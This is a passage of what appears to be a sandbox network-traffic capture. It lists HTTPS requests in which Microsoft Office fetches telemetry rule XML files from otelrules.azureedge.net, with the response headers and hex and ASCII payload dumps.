                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                x-ms-request-id: 96e0b134-501e-0035-148c-3ac923000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095431Z-185f5d8b95c95vpshC1NYC759c0000000a1g000000009c4w
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:31 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                91192.168.2.74979413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:31 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095431Z-185f5d8b95cf7qddhC1NYC66an0000000a3g000000009s2t
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:31 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                92192.168.2.74979513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:31 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095431Z-185f5d8b95cjbkr4hC1NYCeu2400000009x0000000008gft
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:31 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                93192.168.2.74979613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:31 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                x-ms-request-id: e045c2d1-201e-003c-718c-3a30f9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-1777c6cb754xlpjshC1TEBv8cc00000009p00000000016bd
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                94192.168.2.74979713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-185f5d8b95cdcwrthC1NYCy5b80000000a4g0000000010cp
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                95192.168.2.74979913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                x-ms-request-id: 07391e4c-a01e-0032-018c-3a1949000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-185f5d8b95c95vpshC1NYC759c0000000a500000000018ur
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                96192.168.2.74979813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                x-ms-request-id: 96190df9-401e-0016-6a8c-3a53e0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-185f5d8b95cgrrn8hC1NYCgwh400000009xg0000000075u5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                97192.168.2.74980013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                x-ms-request-id: c363d3e9-d01e-0028-158c-3a7896000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-1777c6cb7549j9hhhC1TEBzmcc00000009dg000000002h9w
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                98192.168.2.74980113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1352
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                x-ms-request-id: c363d474-d01e-0028-1b8c-3a7896000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-1777c6cb754b7tdghC1TEBwwa400000009g000000000bxar
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                99192.168.2.74980213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1405
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                x-ms-request-id: f909e935-c01e-0049-358c-3aac27000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-1777c6cb754dqf99hC1TEB5nps000000096g00000000d8su
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
